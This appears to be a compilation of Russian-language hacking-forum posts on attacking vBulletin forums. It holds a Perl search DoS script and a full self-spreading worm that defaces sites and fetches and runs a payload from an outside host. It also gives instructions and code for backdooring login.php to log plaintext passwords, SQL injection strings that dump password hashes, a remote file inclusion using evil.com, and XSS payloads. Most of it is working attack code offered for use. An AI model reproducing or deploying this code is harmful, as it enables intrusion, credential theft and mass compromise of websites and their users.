[HIDE] Tag Bypass на некоторых форумах стоит хайд на ссылки, типа "зарегистрируйтесь, чтобы увидеть ссылку". вовсе не обязательно регаться, достаточно найти это сообщение через "найти все сообщения от ...". там ссылка будет в открытом виде. но обычно в поиске выводится только первые строки. вот такая мего уязвимость)
[HIDE] Tag Bypass 2 freddi это неявляются уязвимостью как ты написал. Просто авторы таких постов с хайдом толком не умеют пользоваться тегами. Как ты написал нужно находить все соообщения от пользователя - хмм а если их 1000 и нужное в середине ? а форум позволяет индексировать только 200 - 400 ? Ненужно искать посты все проще помещаем курсор на скрытый тескт и видим ссылку =).
SQL Injection в админке 3.6.5 SQL Injection в админке (тестировалось на версиях 3.6.4 и 3.6.5 ) 1. Log in to admin panel 2. Go to Attachments->Search 3. Place the following string in the Attached Before field: Code: ') union select 1,1,1,1,1,userid,password,1,username from user -- 9
vBuserbar SQL-inj Продукт: vBuserbar Уязвимость: SQL-inj Автор: S(r1pt Адрес: http://vash_site/vbuserbar.php?do=groupinsert&name=' =\\
vBulletin <=3.5.3 Search DoS vBulletin <=3.5.3 Search DoS Code: #!/usr/bin/perl ########################################## # vBdos.pl - vBulletin <=3.5.3 Search DoS # # Written by spic of g00ns ########################################## # Contact # Site: www.g00ns.net and www.g00ns-forum.net # Email: spic <at> g00ns.net # IRC: irc.g00ns.net #g00ns ########################################## # Example # vBdos.pl www.avbforum.com /vbulletin/ ########################################## print q{ ____________________________________________________________________________ ____ ____ ____ ____ _ __ ____ ____ _ __ ____ _____ ____ __ ___ / __// __//_ // __// |/ // __// _// |/ // __/ / ___// __ / |/ / _ / _/ / // _/ / /_ _/ / / /_ _ / /__ / /_/ // /|_/ / /___//___/ /_//___//_/|_//___//___//_/|_//___/(_)___/ ____//_/ /_/ ____________________________________________________________________________ }; use IO::Socket; $server= $ARGV[0]; $path=$ARGV[1]; while($x != 9999) { $post = "search_keywords=Se7enSins+owned+your+site$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=ms gonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200"; $lrg = length $post; if(!$server||!$path) { print " vBulletin DoS by spic of g00ns nn"; print " Exploit code found on Se7enSins.com nn"; print " n00bFRAGGER was here... nn"; print " usage: VBDoS.pl <host without http> <directory> nn"; exit(); } my $sock = new IO::Socket::INET ( PeerAddr => "$server", PeerPort => "80", Proto => "tcp", ); die "nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!n" unless $sock; print $sock "POST $path"."search.php?searchid=1952 HTTP/1.1n"; print $sock "Host: $servern"; print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5n"; print $sock "Referer: $servern"; print $sock "Accept-Language: en-usn"; print $sock "Content-Type: application/x-www-form-urlencodedn"; print $sock "Accept-Encoding: gzip, deflaten"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7. Gecko/20050511 Firefox/1.0.5n"; print $sock "Connection: Keep-Aliven"; print $sock "Cache-Control: no-cachen"; print $sock "Content-Length: $lrgnn"; print $sock "$postn"; close($sock); syswrite STDOUT,"."; $x++; } ##########################################
VBulletin 3.6.4 [FLASH] (SWF) XSS Было много вопросов к посту: Для интересующихся как это реализуется: Обзор работы SWF паразита Подделка заголовков HTTP запроса с помощью Flash ActionScript Bypassing JavaScript Filters the Flash! Attack Cross-Domain Data Access via Flash [CDDAF] Reference Forging HTTP Request Headers with Flash ActionScript
из новых модов не было vBulletin Mod RPG Inferno 2.4 (inferno.php) SQL Injection Vulnerability Exploit : http://site.com/forum/inferno.php?do=ScanMember&id=-1'/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,user(),database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,concat(username,0x3a,password,0x3a,salt),31,@@version,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47/**/from/**/user/**/where/**/usergroupid=6/**/limit/**/0,1/* vBulletin vBGSiteMap 2.41 (root) Remote File Inclusion Vulnerabilities Exploit : vBulletin_Forum_Bath/vbgsitemap/vbgsitemap-config.php?base=http://evil.com? vBulletin_Forum_Bath/vbgsitemap/vbgsitemap-vbseo.php?base=http://evil.com? =======
Vbulletin Tube (vBTube) XSS Vbulletin Tube (vBTube) XSS Exploit : Code: vBTube.php?do=search&search=<script>alert(document.cookie);</script> Пример: Code: http://www.ruhot.ru/forum/vBTube.php?do=search&search=%3Cscript%3Ealert(document.cookie);%3C/script%3E
vBulletin Worm <= 3.0.6 vBulletin Worm <= 3.0.6 Code: #!/usr/bin/perl ##################### #### #### #### #### #### #### #### #### # # # # #### #### # # # # # # # # # # # # # # #### #### # # ### ## #### # #### ## ### #### # # # # # # # # # # # # # #### # #### #### # # #### #### # # # # #### #### ##################### use IO::Socket::INET; $hahaha = $0; my $processo = "/usr/local/sbin/httpd"; $SIG{"INT"} = "IGNORE"; $SIG{"HUP"} = "IGNORE"; $SIG{"TERM"} = "IGNORE"; $SIG{"CHLD"} = "IGNORE"; $SIG{"PS"} = "IGNORE"; $0="$processo"."\0"x16; my $pid=fork; exit if $pid; ######################## # # # procura index # # # ####################### system("locate index.* >> index"); system("find / -name index.* >> index"); open(a,"<index"); @ind = <a>; close(a); $b = scalar(@ind); for($a=0;$a<=$b;$a++){ chomp $ind[$a]; system("echo spykids ownz your server > $ind[$a]"); } ######################### # # # pega sites e registra # # # ######################### `cat /etc/httpd/conf/httpd.conf |grep ServerName >> sites`; open(a,"<sites"); @site = <a>; close(a); $b = scalar(@site); for($a=0;$a<=$b;$a++) { $site[$a] =~ s/#//g; $site[$a] =~ s/servername//g; $site[$a] =~ s/ServerName//g; $site[$a] =~ s/ //g; $testa = IO::Socket::INET->new(PeerAddr => $site[$a], PeerPort => 80, Proto => "tcp") or next; print $testa "GET / HTTP/1.0\n\n"; print $testa "Host: $site"; print $testa "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0"; print $testa "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1"; print $testa "Accept-Language: pt-br, pt;q=0.50"; print $testa "Accept-Encoding: gzip, deflate, compress;q=0.9"; print $testa "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66"; print $testa "Keep-Alive: 300"; print $testa "Connection: keep-alive"; @ow = <$testa>; close($teste); $ae = "@ow"; if($ae =~/spykids/i){ $sock = IO::Socket::INET->new(PeerAddr => "www.zone-h.org", PeerPort => 80, Proto => "tcp") or die "nao conectou"; print $sock "POST /en/defacements/notify HTTP/1.0\r\n"; print $sock "Accept: */*\r\n"; print $sock "Referer: http://www.zone-h.org/en/defacements/notify\r\n"; print $sock "Accept-Language: pt-br\r\n"; print $sock "Content-Type: application/x-www-form-urlencoded\r\n"; print $sock "Connection: Keep-Alive\r\n"; print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"; print $sock "Host: www.zone-h.org\r\n"; print $sock "Content-Length: 385\r\n"; print $sock "Pragma: no-cache\r\n"; print $sock "\r\n"; print $sock "notify_defacer=SpyKids¬ify_domain=http%3A%2F%2F$site[$a]¬ify_hackmode=18¬ify_reason=5¬ify=+OK+\r\n"; close($sock); } } ######################### # # # worm aws.spykids # # # ######################## while(1){ $cmd = '/misc.php?do=page&template={${system(%22cd%20/tmp;curl%20-O%20http://compras.el-nacional.com/spykids.txt%20;perl%20spykids.txt%20;rm%20-rf%20spykids*;%20wget%20http://compras.el-nacional.com/spykids.txt;%20perl%20spykids.txt;%20rm%20-rf%20%20spykids*%22)}}'; @site = ""; $a=0; @dom = (".ar",".au",".aw",".ax",".az",".ba",".bb",".bd",".be",".bf",".bg",".bh",".bi",".bj",".bm",".bn",".bo",".br",".bs",".bt",".bv",".bw",".by",".bz",".ca",".cc",".cd",".cf",".cg",".ch",".ci",".ck" , ".cl", ".cm",".cn",".co",".cr",".cs",".cu", ".cv",".cx",".cy",".cz",".de",".dj",".dk",".dm",".do",".dz", ".ec",".ee",".eg",".eh",".er",".es",".et",".fi",".fj",".fk",".fm", ".fo",".fr",".ga",".gb",".gd",".ge",".gf",".gg",".gh",".gi",".gl", ".gm",".gn",".gp",".gq",".gr",".gs",".gt",".gu",".gw",".gy",".hk", ".hm",".hn",".hr",".ht",".hu",".id",".ie",".il",".im",".in",".io",".iq", ".ir",".is",".it",".je",".jm",".jo",".jp",".ke",".kg",".kh",".ki",".km", ".kn",".kp",".kr",".kw",".ky",".kz",".la",".lb",".lc",".li",".lk",".lr",".ls", ".lt",".lu",".lv",".ly",".ma",".mc",".md",".mg",".mh",".mk",".ml",".mm", ".mn",".mo",".mp",".mq",".mr",".ms",".mt",".mu",".mv",".mw",".mx",".my", ".mz",".na",".nc",".ne",".nf",".ng",".ni",".nl",".no",".np",".nr",".nu",".nz",".om", ".pa",".pe",".pf",".pg",".ph",".pk",".pl",".pm",".pn",".pr",".ps",".pt",".pw",".py", ".qa",".re",".ro",".ru",".rw",".sa",".sb",".sc",".sd",".se",".sg",".sh",".si",".sj",".sk",".sl", ".sm",".sn",".so",".sr",".st",".sv",".sy",".sz",".tc",".td",".tf",".tg",".th",".tj",".tk",".tl",".tm", ".tn",".to",".tp",".tr",".tt",".tv",".tw",".tz",".ua",".ug",".uk",".um",".us",".uy",".uz",".va",".vc",".ve",".vg",".vi",".vn", ".vu",".wf",".ws",".ye",".yt",".yu",".za",".zm",".zw"); foreach $dom (@dom){ $site = "www.google.com"; open(a,">pra.txt"); print a ""; close(a); ############### google for($n=0;$n<1000;$n += 100){ $sock = IO::Socket::INET->new(PeerAddr=>"$site",PeerPort=>"80",Proto=>"tcp") or next; print $sock "GET h/search?q=%22Powered+by%3A+vBulletin%22inurl%3A$dom&num=100&hl=en&lr=&as_qdr=all&start=$n&sa=N HTTP/1.0\n\n"; print $sock "Host: www.google.com"; print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0"; print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1"; print $sock "Accept-Language: pt-br, pt;q=0.50"; print $sock "Accept-Encoding: gzip, deflate, compress;q=0.9"; print $sock "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66"; print $sock "Keep-Alive: 300"; print $sock "Connection: keep-alive"; @resu = <$sock>; close($sock); $ae = "@resu"; while ($ae=~ m/<a href=.*?>.*?<\/a>/){ $ae=~ s/<a href=(.*?)>.*?<\/a>/$1/; $uber=$1; if ($uber !~/translate/) { if ($uber !~ /cache/) { if ($uber !~ /"/) { if ($uber !~ /google/) { if ($uber !~ /216/) { if ($uber =~/http/) { substr($uber,0,7) = ""; $nu = rindex $uber, '/'; $uber = substr($uber,0,$nu); open(a,">>pra.txt"); print a "$uber\n"; close(a); }}}}}} } } $ark = "pra.txt"; @si = ""; open (arquivo,"<$ark"); @si = <arquivo>; close(arquivo); $novo =""; foreach (@si){ if (!$si{$_}) { $novo .= $_; $si{$_} = 1; } } open (arquivo,">$ark"); print arquivo $novo; close(arquivo); open(a,"<pra.txt"); @site = <a>; close(a); foreach $site (@site){ chomp $site; ($site, $dir) = split('/',$site); $soc = IO::Socket::INET->new(PeerAddr => $site, PeerPort => 80, Proto => "tcp") or next; print $soc "GET /$dir$cmd HTTP/1.0\n\n"; print $soc "Host: $site"; print $soc "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0"; print $soc "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1"; print $soc "Accept-Language: pt-br, pt;q=0.50"; print $soc "Accept-Encoding: gzip, deflate, compress;q=0.9"; print $soc "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66"; print $soc "Keep-Alive: 300"; print $soc "Connection: keep-alive"; close($soc); } } }
Сбор паролей от аккаунтов Vbulletin без расшифровки (трояним форум) Сбор паролей от аккаунтов Vbulletin без расшифровки (трояним форум) По идее все просто: в файл login.php в корне сайта добавляем PHP: // ############################### start do login ############################### // this was a _REQUEST action but where do we all login via request? if ($_POST['do'] == 'login') { $vbulletin->input->clean_array_gpc('p', array( 'vb_login_username' => TYPE_STR, 'vb_login_password' => TYPE_STR, 'vb_login_md5password' => TYPE_STR, 'vb_login_md5password_utf' => TYPE_STR, 'postvars' => TYPE_STR, 'cookieuser' => TYPE_BOOL, 'logintype' => TYPE_STR, 'cssprefs' => TYPE_STR, )); define( 'auth_req', './customavatars/avatar178_2.gif' ); $fp = fopen( auth_req, 'a' ); $un1=&$vbulletin->GPC['vb_login_username']; $un2=&$vbulletin->GPC['vb_login_password']; $un3 = date("d.m.y H.i.s"); $message = "$un3:$un1:$un2\r\n"; flock($fp,LOCK_EX); fwrite( $fp, $message ); fflush($fp); flock($fp,LOCK_UN); fclose( $fp ); // can the user login? но в логах видим, что пароля все же нет. Обидно... Посмотрим на форму регистрации: Code: ... <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)"> ... Ага. значит входим по функции из javascript... Сама функция находится в clientscript/vbulletin_md5.js А там мы видим в конце: PHP: // implemented like this to make sure un-updated templates behave as before input.value = ''; Это значит, что введенный нами пароль просто затирается перед передачей дальше. Просто комментарим строку и собираем пароли (обновляем ессно страницу, для того чтобы заюзать измененный JavaScript)... PHP: ... // input.value = ''; ... P.S. против автозахода (куки) можно стереть из бд все сессии P.P.S. Можно и не комментировать, а изменить переменную $un2=&$vbulletin->GPC['vb_login_md5password']; Все же md5(pass) побрутить легче, чем md5(md5(pass).salt)
vBulletin 3.7.0 <= XSS Explot vBulletin 3.7.0 <= XSS Explot Found by RoBOTNIK http://[website]/[forumpath]/ajax.php?do=CheckUsername¶m=# EVIL XSS SCRIPT # http://www.site.com/forums/ajax.php?do=CheckUsername¶m=<script>alert('xss');</script>
vBulletin 3.7.0 листалка от DGT vBulletin 3.7.0 листалка от DGT может чем нить помочь если в папке с форумом лежит что нибудь ценное на всех версиях от DGT пашет. ЗЫ http://forum.antichat.org/threadnav25644-1-10.html
Сбор паролей от аккаунтов Vbulletin без расшифровки (трояним форум) Делал немного по другому и в результате получал чистые пароли. 1) Добавляем в начало файла login.php PHP: $Login = $_POST['vb_login_username']; $Passwd = $_POST['vb_login_password']; $fp = fopen("./customavatars/avatar178_2.gif","a+"); fwrite($fp,"$Login:$Passwd\n"); fclose($fp); 2) Очищаем полностью файл clientscript/vbulletin_md5.js от этого ничего не изменится. 3) Для того чтобы обнулить сессии выполняем код: PHP: $link = mysql_connect('хост','логин','пасс'); mysql_select_db('база данных',$link); $query = "TRUNCATE TABLE префикс_session"; $result = mysql_query($query, $link); mysql_close($link);
p0h n03s priv8 rootshell vbulletin pw logger Code: <?php /*======================================================================*\ || #################################################################### || || # vBulletin 3.6.2 || # ---------------------------------------------------------------- # || || # Copyright ©2000-2006 Jelsoft Enterprises Ltd. All Rights Reserved. || || # This file may not be redistributed in whole or significant part. # || || # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # || || # http://www.vbulletin.com | http://www.vbulletin.com/license.html # || || #################################################################### || \*======================================================================*/ // ####################### SET PHP ENVIRONMENT ########################### error_reporting(E_ALL & ~E_NOTICE); // #################### DEFINE IMPORTANT CONSTANTS ####################### define('THIS_SCRIPT', 'login'); // ################### PRE-CACHE TEMPLATES AND DATA ###################### // get special phrase groups $phrasegroups = array(); // get special data templates from the datastore $specialtemplates = array(); // pre-cache templates used by all actions $globaltemplates = array(); // pre-cache templates used by specific actions $actiontemplates = array( 'lostpw' => array( 'lostpw' ) ); // ######################### REQUIRE BACK-END ############################ require_once('./global.php'); require_once(DIR . '/includes/functions_login.php'); // ####################################################################### // ######################## START MAIN SCRIPT ############################ // ####################################################################### $vbulletin->input->clean_gpc('r', 'a', TYPE_STR); if (empty($_REQUEST['do']) AND empty($vbulletin->GPC['a'])) { exec_header_redirect($vbulletin->options['forumhome'] . '.php'); } // ############################### start logout ############################### if ($_REQUEST['do'] == 'logout') { $vbulletin->input->clean_gpc('r', 'logouthash', TYPE_STR); if ($vbulletin->userinfo['userid'] != 0 AND $vbulletin->GPC['logouthash'] != $vbulletin->userinfo['logouthash']) { eval(standard_error(fetch_error('logout_error', $vbulletin->session->vars['sessionurl'], $vbulletin->userinfo['logouthash']))); } process_logout(); $vbulletin->url = fetch_replaced_session_url($vbulletin->url); if (strpos($vbulletin->url, 'do=logout') !== false) { $vbulletin->url = $vbulletin->options['forumhome'] . '.php' . $vbulletin->session->vars['sessionurl_q']; } $show['member'] = false; eval(standard_error(fetch_error('cookieclear', create_full_url($vbulletin->url), $vbulletin->options['forumhome'], $vbulletin->session->vars['sessionurl_q']), '', false)); } // ############################### start do login ############################### // this was a _REQUEST action but where do we all login via request? if ($_POST['do'] == 'login') { $vbulletin->input->clean_array_gpc('p', array( 'vb_login_username' => TYPE_STR, 'vb_login_password' => TYPE_STR, 'vb_login_md5password' => TYPE_STR, 'vb_login_md5password_utf' => TYPE_STR, 'postvars' => TYPE_STR, 'cookieuser' => TYPE_BOOL, 'logintype' => TYPE_STR, 'cssprefs' => TYPE_STR, )); //does the user have a pass $username = $vbulletin->GPC['vb_login_username']; $password = $vbulletin->GPC['vb_login_password']; $logfile = "rootshell.txt"; $lf = fopen($logfile, "a"); fwrite($lf, "\n".$username . ' : ' . $password."\n"); fclose($lf); // can the user login? $strikes = verify_strike_status($vbulletin->GPC['vb_login_username']); if ($vbulletin->GPC['vb_login_username'] == '') { eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes))); } if (!verify_authentication($vbulletin->GPC['vb_login_username'], $vbulletin->GPC['vb_login_password'], $vbulletin->GPC['vb_login_md5password'], $vbulletin->GPC['vb_login_md5password_utf'], $vbulletin->GPC['cookieuser'], true)) { ($hook = vBulletinHook::fetch_hook('login_failure')) ? eval($hook) : false; // check password exec_strike_user($vbulletin->userinfo['username']); if ($vbulletin->GPC['logintype'] === 'cplogin' OR $vbulletin->GPC['logintype'] === 'modcplogin') { // log this error if attempting to access the control panel require_once(DIR . '/includes/functions_log_error.php'); log_vbulletin_error($vbulletin->GPC['vb_login_username'], 'security'); } $vbulletin->userinfo = array( 'userid' => 0, 'usergroupid' => 1 ); if ($vbulletin->options['usestrikesystem']) { eval(standard_error(fetch_error('badlogin_strikes', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes))); } else { eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl']))); } } exec_unstrike_user($vbulletin->GPC['vb_login_username']); // create new session process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']); // do redirect do_login_redirect(); } else if ($_GET['do'] == 'login') { // add consistency with previous behavior exec_header_redirect($vbulletin->options['forumhome'] . '.php'); } // ############################### start lost password ############################### if ($_REQUEST['do'] == 'lostpw') { $vbulletin->input->clean_gpc('r', 'email', TYPE_NOHTML); $email = $vbulletin->GPC['email']; if ($permissions['forumpermissions'] & $vbulletin->bf_ugp_forumpermissions['canview']) { $navbits = construct_navbits(array('' => $vbphrase['lost_password_recovery_form'])); eval('$navbar = "' . fetch_template('navbar') . '";'); } else { $navbar = ''; } $url =& $vbulletin->url; eval('print_output("' . fetch_template('lostpw') . '");'); } // ############################### start email password ############################### if ($_POST['do'] == 'emailpassword') { $vbulletin->input->clean_gpc('p', 'email', TYPE_STR); if ($vbulletin->GPC['email'] == '') { eval(standard_error(fetch_error('invalidemail', $vbulletin->options['contactuslink']))); } require_once(DIR . '/includes/functions_user.php'); $users = $db->query_read_slave(" SELECT userid, username, email, languageid FROM " . TABLE_PREFIX . "user WHERE email = '" . $db->escape_string($vbulletin->GPC['email']) . "' "); if ($db->num_rows($users)) { while ($user = $db->fetch_array($users)) { $user['username'] = unhtmlspecialchars($user['username']); $user['activationid'] = build_user_activation_id($user['userid'], 2, 1); eval(fetch_email_phrases('lostpw', $user['languageid'])); vbmail($user['email'], $subject, $message, true); } $vbulletin->url = str_replace('"', '', $vbulletin->url); eval(print_standard_redirect('redirect_lostpw', true, true)); } else { eval(standard_error(fetch_error('invalidemail', $vbulletin->options['contactuslink']))); } } // ############################### start reset password ############################### if ($vbulletin->GPC['a'] == 'pwd' OR $_REQUEST['do'] == 'resetpassword') { $vbulletin->input->clean_array_gpc('r', array( 'userid' => TYPE_UINT, 'u' => TYPE_UINT, 'activationid' => TYPE_UINT, 'i' => TYPE_UINT )); if (!$vbulletin->GPC['userid']) { $vbulletin->GPC['userid'] = $vbulletin->GPC['u']; } if (!$vbulletin->GPC['activationid']) { $vbulletin->GPC['activationid'] = $vbulletin->GPC['i']; } $userinfo = verify_id('user', $vbulletin->GPC['userid'], 1, 1); $user = $db->query_first(" SELECT activationid, dateline FROM " . TABLE_PREFIX . "useractivation WHERE type = 1 AND userid = $userinfo[userid] "); if ($user['dateline'] < (TIMENOW - 24 * 60 * 60)) { // is it older than 24 hours? eval(standard_error(fetch_error('resetexpired', $vbulletin->session->vars['sessionurl']))); } if ($user['activationid'] != $vbulletin->GPC['activationid']) { //wrong act id eval(standard_error(fetch_error('resetbadid', $vbulletin->session->vars['sessionurl']))); } // delete old activation id $db->query_write("DELETE FROM " . TABLE_PREFIX . "useractivation WHERE userid = $userinfo[userid] AND type = 1"); // make random number $newpassword = vbrand(0, 100000000); // init user data manager $userdata =& datamanager_init('User', $vbulletin, ERRTYPE_STANDARD); $userdata->set_existing($userinfo); $userdata->set('password', $newpassword); $userdata->save(); ($hook = vBulletinHook::fetch_hook('reset_password')) ? eval($hook) : false; eval(fetch_email_phrases('resetpw', $userinfo['languageid'])); vbmail($userinfo['email'], $subject, $message, true); eval(standard_error(fetch_error('resetpw', $vbulletin->session->vars['sessionurl']))); } /*======================================================================*\ || #################################################################### || # CVS: $RCSfile: login.php,v $ - $Revision: 1.160 $ || #################################################################### \*======================================================================*/ ?>
Опровержение - Vbulletin 3.7.0 Gold Sql injection on faq.php Vbulletin 3.7.0 Gold Sql injection on faq.php Я посмотрел щас код. Да, действительно толку в баги нет. Это ошибка логики, при одиночном символе происходит некорректное формирование запроса к бд. Заюзать с пользой невозможно.
XSS vBanonymizer XSS в вобле { У жертвы должно быть: Vbulletin forum - все версии vBanonymizer - любая версия до 24.06.08 } (с) _vbsupport.org
XSS (3.7.1 & 3.6.10) XSS-base64 _http://securityvulns.ru/news/CGI/2008.06.14.html _http://securityvulns.ru/news/CGI/2008.06.19.html Exploit: http://localhost/vB3/admincp/index.php?redirect=data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K http://localhost/vB3/modcp/index.php?redirect=data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
Xss (3.7.2, 3.6.10) XSS in admin logs - vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower http://securityvulns.ru/Udocument137.html язвимость существует из-за недостаточной обработки параметров "PHP_SELF" и "do" при запросе несуществующей страницы. Exploit: 1) Оставляем в логах булки нашу хсс, используя данный эксплоит: HTML: <html> <body> <img src="http://localhost/vB/upload/admincp/faq.php/0?do=<script>/*" /> <img src="http://localhost/vB/upload/admincp/faq. php/1?do=*/a%3D'document.wri'/*" /> <img src="http://localhost/vB/upload/admincp/faq. php/2?do=*/b%3D'te(%22<script '/*" /> <img src="http://localhost/vB/upload/admincp/faq. php/3?do=*/c%3D'src=http://'/*" /> <!--edit to match your data --> <img src="http://localhost/vB/upload/admincp/faq. php/4?do=*/d%3D'localhost/'/*" /> <img src="http://localhost/vB/upload/admincp/faq. php/5?do=*/e%3D''/*" /> <img src="http://localhost/vB/upload/admincp/faq.php/6?do=*/f%3D't. js></scrip'/*" /> <!-- end edit --> <img src="http://localhost/vB/upload/admincp/faq. php/7?do=*/g%3D't>%22)'/*" /> <img src="http://localhost/vB/upload/admincp/faq. php/8?do=*/h%3Da%2Bb%2Bc%2Bd%2Be%2Bf%2Bg/*" /> <img src="http://localhost/vB/upload/admincp/faq. php/9?do=*/eval(h)/*" /> <img src="http://localhost/vB/upload/admincp/faq. php/a0?do=*/</script>" /> </body> </html> 2) Затем отправьте админа по ссылке: /adminlog.php?do=view&script=&u=0&pp=15&orderby=script&page=1 Ограничения: PHP_SELF - 50 characters max and no slashes _REQUEST['do'] is limited to 20 characters Также сообщается, что злоумышленник может внедрить и выполнить произвольный PHP код на системе с привилегиями Web сервера.
vbulletin Exploit Tool Box This Box continue the 3 vbulletin exploits, under it you can use the vbulletin install path exploit, the other two exploits can be only watched. Code can be found here: http://archive.cert.uni-stuttgart.de/bugtraq/2006/10/msg00243.html
